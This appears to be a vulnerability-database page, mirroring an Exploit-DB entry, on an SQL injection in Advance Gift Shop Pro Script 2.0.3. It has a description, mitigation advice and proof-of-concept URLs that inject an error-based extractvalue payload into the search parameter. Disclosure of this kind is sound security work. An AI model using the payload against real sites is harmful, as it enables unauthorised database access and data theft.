header-logo
Suggest Exploit
vendor:
Advance Gift Shop Pro Script
by:
Mr Winst0n
9
CVSS
CRITICAL
SQL Injection
89
CWE
Product Name: Advance Gift Shop Pro Script
Affected Version From: 2.0.3
Affected Version To: 2.0.3
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Kali Linux, Windows 8.1
2019

Advance Gift Shop Pro Script 2.0.3 – SQL Injection

The Advance Gift Shop Pro Script version 2.0.3 is vulnerable to SQL Injection. An attacker can exploit this vulnerability by injecting malicious SQL code into the 's' parameter of the search functionality. This can lead to unauthorized access, data leakage, and potential manipulation of the database.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize and validate user input before executing any SQL queries. Additionally, using prepared statements or parameterized queries can help prevent SQL Injection attacks.
Source

Exploit-DB raw data:

# Exploit Title: Advance Gift Shop Pro Script 2.0.3 - SQL Injection
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan[@]gmail[.]com
# Discovery Date: February 21, 2019
# Vendor Homepage: http://www.phpscriptsmall.com/
# Software Link : https://www.phpscriptsmall.com/product/gifts-shop/
# Tested Version: 2.0.3
# Tested on: Kali linux, Windows 8.1 


# PoC:

# http://localhost/[PATH]/?category=&s=[SQL]&search_posttype=product
# http://localhost/[PATH]/?category=&s=1%20and%20extractvalue(rand(),concat(0x7e,version()))&search_posttype=product

Navigation

Suggest Exploit

Services By CQR